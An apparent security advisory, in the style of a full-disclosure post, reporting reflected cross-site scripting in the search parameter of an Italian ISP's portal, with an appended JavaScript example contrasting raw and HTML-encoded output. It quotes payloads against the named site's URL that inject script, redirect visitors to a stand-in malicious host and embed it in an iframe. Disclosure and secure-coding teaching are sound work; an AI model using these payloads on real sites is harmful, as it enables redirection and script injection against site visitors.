The Italian ISP <a href="http://Libero.it" target="_blank">Libero.it</a> does not check the HTTP POST parameter "p_Query" on search queries and displays the content of this variable unmodified within the HTML form area.
<br clear="all">
<br>Security problems on Libero's <a href="http://155.it" target="_blank">155.it</a> allow attackers to conduct XSS attacks against the following URL:<br><br><a href="http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=" target="_blank">http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=</a><br><br>It is vulnerable to XSS via a malformed search query.<br>
<br>PoC:<br><br>- XSS in search function<br><br><a href="http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=" target="_blank">http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=</a>&lt;script&gt;alert(XSS)&lt;script&gt;
<br><br>- Redirect<br><br><a href="http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=" target="_blank">http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=</a>&lt;script&gt;location.href="http://www.maliciouswebsite.com";&lt;/script&gt;<br><br>- HTML injection (iframe)
<br><br><a href="http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=" target="_blank">http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=</a> &lt;iframe src="http://www.maliciouswebsite.com"&gt;&lt;/iframe&gt;<br><br>Previous vulnerabilities:<br><br><a href="http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/061957.html" target="_blank">http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/061957.html
</a><br><a href="http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/061939.html" target="_blank">http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/061939.html</a><br><a href="http://lists.grok.org.uk/pipermail/full-disclosure/2007-April/062055.html" target="_blank">http://lists.grok.org.uk/pipermail/full-disclosure/2007-April/062055.html</a><br><a href="http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064680.html" target="_blank">http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064680.html</a><br><a href="http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064681.html" target="_blank">http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064681.html</a><br><br>-- <br>Gianni Amato<br><a href="http://www.gianniamato.it/" target="_blank">http://www.gianniamato.it/</a>
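<br><br>The missing output encoding behind this report, as an added example that is not part of the original advisory and is not the site's own code: a hypothetical search template echoes p_Query with and without HTML encoding, and a rough regex check lists the elements a browser would open. The template, the function names and the third sample input are assumptions; the first two inputs are the strings quoted in the PoC.

```javascript
// Added example: hypothetical search handler, not the site's real code.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode every character that can end a text node or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical template: the query is echoed as text and as the input's value.
// encode=false reproduces the behaviour the advisory describes.
function renderForm(pQuery, encode) {
  const q = encode ? escapeHtml(pQuery) : pQuery;
  return '<form method="post">' +
    "<p>Results for: " + q + "</p>" +
    '<input type="text" name="p_Query" value="' + q + '">' +
    "</form>";
}

// Rough check (regex, not a full HTML parser): names of the start tags present.
function openedElements(html) {
  const names = [];
  for (const m of html.matchAll(/<([a-zA-Z][a-zA-Z0-9]*)\b/g)) {
    names.push(m[1].toLowerCase());
  }
  return names;
}

// First two strings are quoted from the advisory; the third is a constructed
// benign query that must survive encoding unchanged in meaning.
const SAMPLES = [
  "<script>alert(XSS)<script>",
  '<iframe src="http://www.maliciouswebsite.com"></iframe>',
  "rock & roll",
];

// For each sample, report whether the page gained elements beyond the template's own.
function audit(encode) {
  const expected = "form,p,input";
  return SAMPLES.map((s) => ({
    input: s,
    injected: openedElements(renderForm(s, encode)).join(",") !== expected,
  }));
}

console.log("unencoded:", audit(false));
console.log("encoded:  ", audit(true));
```

Encoding at the point of output, for the context the value lands in, is what neutralises all three PoC variants; input filtering alone does not replace it.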